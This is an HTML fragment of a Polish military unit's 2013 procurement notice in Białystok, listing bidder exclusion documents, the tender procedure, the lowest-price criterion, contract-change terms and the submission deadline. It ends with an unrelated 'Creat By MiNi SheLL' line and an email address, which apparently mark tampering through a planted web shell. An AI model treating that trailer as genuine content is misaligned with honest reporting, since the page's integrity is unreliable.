<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający może zmienić postanowienia umowy w stosunku do oferty Wykonawcy zgodnie z art. 144 ust. 1 ustawy z dnia 29.01.2004 r. prawo zamówień publicznych w zakresie: Zamawiający dopuszcza możliwość zmiany osób odpowiedzialnych za realizację umowy oraz osób wymienionych w § 3 jeżeli zajdzie taka potrzeba -  w przypadku rozwiązania lub wygaśnięcia stosunku pracy z daną osobą lub zdarzenia losowego, choroby uniemożliwiającej pełnienie powierzonych jej obowiązków.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 25 Wojskowy Oddział Gospodarczy w Białymstoku, ul. Kawaleryjska 70, 15-601 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2013 godzina 10:00, miejsce: Siedziba Zamawiającego, Kancelaria Jawna bud. nr 1, pok.3, ul. Kawaleryjska 70, 15-601 Białystok.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com